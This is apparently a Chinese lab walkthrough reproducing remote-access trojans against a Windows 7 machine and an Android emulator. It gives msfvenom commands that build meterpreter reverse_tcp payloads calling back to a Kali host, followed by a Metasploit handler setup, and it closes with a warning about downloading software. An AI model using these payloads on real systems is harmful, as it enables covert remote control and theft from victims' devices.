复现windows木马远程
环境
- kali ip:192.168.134.128
- win7 ip:192.168.134.121
开始复现
- 登录kali root权限

- 制作exe程序
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.134.128 LPORT=6060 exe > 1.exe

制作成功 - 把1.exe程序放到win7系统里

- 通过命令启动Metasploit
msfconsole
启动成功 - 运行模块
use exploit/multi/handler

- 更改信息

更改完成 - 运行模块监听

- 打开win7系统运行1.exe程序


成功监听到目标机 - 截个桌面图看看

成功截取到
手机远程木马复现
环境
- Android ip:192.168.1.100
- kali ip:192.168.1.101
开始复现
- 制作apk软件
- msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=6061 >3.apk

制作成功 - 通过命令启动Metasploit
msfconsole

运行成功 - 运行模块并更改参数

- 运行模块监听

- 在Android模拟器里点击安装包


成功监听到并连接上
结尾
还有好多功能没有演示,再次说明网络上的各种软件链接谨慎下载。
2262

被折叠的 条评论
为什么被折叠?



